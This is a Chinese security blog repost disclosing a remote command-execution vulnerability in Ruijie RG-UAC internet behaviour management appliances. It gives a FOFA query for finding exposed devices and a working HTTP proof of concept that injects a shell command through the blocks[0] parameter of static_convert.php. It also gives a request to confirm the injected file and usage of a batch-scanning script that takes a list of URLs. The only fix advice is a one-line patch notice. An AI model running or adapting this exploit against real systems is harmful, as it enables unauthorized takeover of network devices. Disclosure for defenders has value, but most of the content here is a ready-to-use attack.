锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

admin 2024年7月1日08:08:08评论29 views字数 1082阅读3分36秒阅读模式
 

fofa

title="RG-UAC登录页面"

资产页面

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

一、漏洞简述

锐捷统一上网行为管理与审计RG-UAC是星网锐捷网络有限公司自主研发的业界领先的上网行为管理与审计产品,以路由、透明或混合模式部署在网络的关键节点上,对数据进行2-7层的全面检查和分析,深度识别、管控和审计数百种IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频应用等常见应用,并利用智能流控、智能阻断、智能路由、智能DNS策略等技术提供强大的带宽管理特性,配合创新的社交网络行为精细化管理功能、清晰易管理日志等功能,同时具备了最精细的用户上网行为的审计功能,提供了业界最全面、完善的上网行为管理解决方案。锐捷统一上网行为管理与审计RG-UAC产品线提供不同档次的多款型号,适用于数据中心、大型网络边界、中小型企业等全业务应用场景。其接口static_convert存在任意命令执行漏洞,攻击者可通过该漏洞获取系统权限。

二、漏洞检测poc

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||echo%20'HelloWorldTest1'>/var/www/html/tmptest%0A HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: close

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

GET /tmptest HTTP/1.1Host:x.x.x.xConnection: close

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

https://github.com/ATonysan/poc-exp/blob/main/Ruijie_BehaviorManagement_staticconvert_RCE.py

批量检测:

python Ruijie_BehaviorManagement_staticconvert_RCE.py -f url.txt

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

单个url检测漏洞:

python Ruijie_BehaviorManagement_staticconvert_RCE.py -u url

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

四、修复

官方已更新补丁,请升级至最新版本。

官网地址:https://www.ruijie.com.cn/

原文始发于微信公众号(苏诺木安全团队):【1day】锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月1日08:08:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】https://cn-sec.com/archives/2902904.html

发表评论

匿名网友 填写信息